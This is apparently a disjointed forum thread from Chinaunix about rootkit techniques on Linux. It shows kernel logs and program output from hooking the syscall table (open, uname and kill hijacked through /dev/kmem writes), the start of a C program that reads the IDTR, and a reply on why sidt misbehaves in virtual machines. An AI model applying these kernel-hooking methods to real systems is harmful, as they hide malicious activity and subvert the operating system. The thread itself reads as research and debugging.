Sep 24 19:06:49 localhost kernel: intercept: function:get_sys_call_table-L220: sys_call_table at 0xc11f14e0, call dispatch at 0xcebeceaa
Sep 24 19:06:49 localhost kernel: intercept: function:intercept_init-L276: sys call table address c11f14e0
Sep 24 19:06:50 localhost kernel: intercept: function:new_open-L234: hello
Sep 24 19:07:00 localhost last message repeated 460 times
idtr base at 0xC036C000
idt80: flags=EF sel=60 off=C010388C
sys_call_table at 0xc02bfaa0, call dispatch at 0xbf8debae
addr(__kmalloc): c0171d25
kmalloc: 0xc0171d25
Old sys_uname: 0xc012df46
off: 0xc02bfc88
write: 4
Now sys_uname: 0xc0171d25
off: 0xc02bfc88
write: 4
Kernel Space allocation: 0xf6d12440
Write Kill Opcode To Kernel Buf.
addr(u per_cpu__current_task): c03b4000
addr(sys_kill): c012ba45
off: 0xf6d12440
write: 85
Write Opcode Successed!
off: 0xc02bfb34
write: 4
hijack sys_kill from 0xc012ba45[-1072514491] to 0xf6d12440[-154065856]
###NOTES to recovery sys_kill.
debian-wangyao:/home/wangyao/Documents/Reports/rootkit_report/0802/code/others/print_sys_call_table# tail /var/log/kern.log
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431383] CPU1 attaching NULL sched-domain.
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] CPU0 attaching sched-domain:
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] domain 0: span 0-1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] groups: 0 1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] CPU1 attaching sched-domain:
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] domain 0: span 0-1
Oct 20 09:59:35 debian-wangyao kernel: [ 78.431454] groups: 1 0
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] system_call: 0xc010388c
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] Here Find sys_call_table: 0xc01038ca
Oct 20 10:02:27 debian-wangyao kernel: [ 252.056927] sys_call_table: 0xc02bfaa0
[root@localhost misc-progs]# ./a.out
idtr base at 0xFFC18000, limit at 0x7FF
idt80: flags=0 sel=0 off=0
readkmem: mmap: Input/output error
Segmentation fault
[root@localhost misc-progs]#
Oct 20 10:18:41 localhost kernel: syscall intercept: Hi, poor linux!
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L196: idtr base at 0xC12B2000, limit at 0x7FF
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L204: idt80: flags=EF sel=60 off=C1003CC4
Oct 20 10:18:41 localhost kernel: intercept: function:get_sys_call_table-L220: sys_call_table at 0xc11f14e0, call dispatch at 0xc3eadeaa
Oct 20 10:18:41 localhost kernel: intercept: function:intercept_init-L276: sys call table address c11f14e0
Oct 20 10:18:41 localhost kernel: intercept: function:new_open-L234: call open()
Oct 20 10:18:45 localhost last message repeated 19 times
Oct 20 10:18:45 localhost kernel: syscall intercept: bye, poor linux!
int main (int argc, char **argv)
{
unsigned sys_call_off;
int kmem_fd; // /dev/kmem文件描述符
unsigned sct;
char sc_asm[CALLOFF],*p;
/* 获得IDTR寄存器的值 */
asm ("sidt %0" : "=m" (idtr));
printf("idtr base at 0x%X\n",(int)idtr.base);
原帖由 CUDev 于 2009-10-20 10:37 发表
也不太对,你试一下
http://blog.chinaunix.net/u/12592/showart_1421096.html
中的/dev/kmem的代码。
BTW:你的测试环境是什么?
在大多数的虚拟机中将无法顺利的读取IDTR。因为lidt指令是一个特权指令,将会产生一个异常,并被VM所捕获。这样可以使VM为每一个操作系统维持一个虚拟的IDTR。因为sidt指令没有被处理,它将会返回一个伪造的IDTR地址,通常会大于0xFFC00000。
欢迎光临 Chinaunix (http://bbs.chinaunix.net/) | Powered by Discuz! X3.2 |